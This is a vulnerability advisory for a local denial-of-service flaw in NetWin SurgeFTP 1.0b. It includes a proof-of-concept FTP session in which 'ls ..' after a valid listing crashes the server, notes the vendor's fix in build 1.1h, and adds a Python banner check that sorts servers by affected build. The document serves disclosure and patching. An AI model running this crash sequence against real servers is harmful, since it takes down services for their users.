VERSION AFFECTED
- NetWin’s SurgeFTP 1.0b
DESCRIPTION
A Denial of Service (DoS) condition exists in NetWin’s SurgeFTP 1.0b that lets any user with local access to the SurgeFTP host crash the server. Issuing a malformed request for a directory listing, such as “ls ..”, after successfully issuing a previous valid request for a listing might crash the server.
DEMONSTRATION
SNS Research provided the following proof-of-concept scenario:
# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
ftp> ls /
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer
(..)
VENDOR RESPONSE
The vendor, NetWin, has released build v1.1h that corrects this issue. It is available at ftp://ftp.netwinsite.com/pub/surgeftp/surgeftp11h_nt.exe
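For inventory purposes, the 220 greeting shown in the demonstration can be matched against the two builds this advisory names. The following is an added example, not code from SNS Research or NetWin; the helper names `parse_version` and `classify` are hypothetical, the sample greetings other than the one quoted above are constructed, and treating builds later than 1.1h as fixed is an assumption.

```python
import re

# Builds named in the advisory: 1.0b is affected, 1.1h carries the fix.
AFFECTED = (1, 0, "b")
FIXED = (1, 1, "h")

# Matches the greeting from the demonstration:
#   220 SurgeFTP testbak (Version 1.0b)
BANNER_RE = re.compile(
    r"^220[ -]SurgeFTP\b.*\(Version\s+(\d+)\.(\d+)([a-z]?)\)", re.IGNORECASE
)


def parse_version(greeting):
    """Return (major, minor, letter) from an FTP 220 greeting, or None.

    Multi-line greetings ("220-" continuation lines) are scanned line by line.
    """
    for line in greeting.splitlines():
        m = BANNER_RE.match(line.strip())
        if m:
            return int(m.group(1)), int(m.group(2)), m.group(3).lower()
    return None


def classify(greeting):
    """Classify a greeting against the builds the advisory names."""
    version = parse_version(greeting)
    if version is None:
        return "not-surgeftp"
    if version == AFFECTED:
        return "affected"
    if version >= FIXED:  # assumption: builds after 1.1h keep the fix
        return "fixed"
    # The advisory says nothing about other builds below 1.1h.
    return "unverified"


if __name__ == "__main__":
    samples = [
        "220 SurgeFTP testbak (Version 1.0b)",           # from the advisory
        "220 SurgeFTP files01 (Version 1.1h)",           # constructed
        "220-Welcome\n220 SurgeFTP a (Version 1.0f)",    # constructed
        "220 Some other FTP server ready.",              # constructed
    ]
    for s in samples:
        print(classify(s), "<-", s.splitlines()[-1])
```

A greeting can be edited or suppressed by an administrator, so a "fixed" or "not-surgeftp" result is a hint for triage rather than proof of the installed build.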
CREDIT
Discovered by SNS Research.